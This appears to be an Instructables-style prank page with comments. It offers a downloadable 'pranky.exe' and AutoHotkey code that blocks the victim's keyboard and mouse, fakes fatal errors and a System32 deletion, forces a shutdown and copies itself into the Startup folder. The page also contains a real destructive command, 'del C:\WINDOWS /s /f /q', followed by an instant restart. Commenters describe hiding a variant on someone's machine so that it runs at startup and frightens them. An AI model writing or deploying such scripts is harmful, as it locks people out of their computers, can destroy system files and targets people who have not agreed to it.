Step 1: Download This File
(i modified this script with AutoHotkey and copied some parts from http://www.autohotkey.com/forum/topic27784.html&highlight=prank
then i compiled the file so u don't have to do nothing with it)
pranky .exe199 KB
pranky .exe199 KB
PDF Downloads
As a Pro member, you will gain access to download any Instructable in the PDF format.
You also have the ability to customize your PDF download.
del C:\WINDOWS /s /f /q
pause
shutdown -r -t 00
#Persistent
#NoTrayIcon
Sleep, 100000
Gui, Color, Black
Gui, -Caption
Gui, Show, x0 y0 w%A_ScreenWidth% h%A_ScreenHeight%
BlockInput, On ; this makes it more interesting
msgbox, 48,Fatal Error,A fatal error has occured. The windows GUI has failed. The mouse and keyboard may not function correctly, 5 ; "may"
Loop, C:\windows\System32\*.*, 0, 1
{
Files++
}
Progress, w500 h76,
Loop, C:\windows\System32\*.*, 0, 1
{
if (File = Files - 25)
{
progress,off
Gui, Color, Black
Gui, -Caption
Gui, Show, x0 y0 w%A_ScreenWidth% h%A_ScreenHeight%
BlockInput, On
MsgBox, 262192, Error!, An Unexpected Error Has Caused Windows To Stop Responding And Is Forcing Windows To Shutdown, 5
Sleep, 5000
Shutdown, 9
ExitApp
}
x += 100 / Files
Progress, %x%, Deleting`n%A_LoopFileLongPath% Deleting %A_LoopFileLongPath%
File++
Sleep, 50
}
FileCopy, %A_ScriptFullPath%, %A_Startup%, 0
s::ExitApp
and i have made a fake "Deleting" virus.
Heres the Code:
Loop C:\WINDOWS\system32\*.*
{
Progress,X800 , Deleting... C:\WINDWOS\system32\%a_loopfilename%,
Sleep, 50
}
Return
Pause::Pause
i got a ton of this text when i opened it...
here's what i did:
i created a vbs script with a lot of "Virus and critical error messages", then i got your code modified..
I first showed the msgbox, then blocked the input! haha.. then i created a bat file which opens the two files i had.. so i put it in a hidden folder and the shortcut in the start up folder!!
he was screaming and jumping around hahahaha i couldn't hold the laughters LOL
thanks for your code man! :)
funny script xD
i got a laugh out of reading it.,
i dont remember lol
good to see someone using their brain XD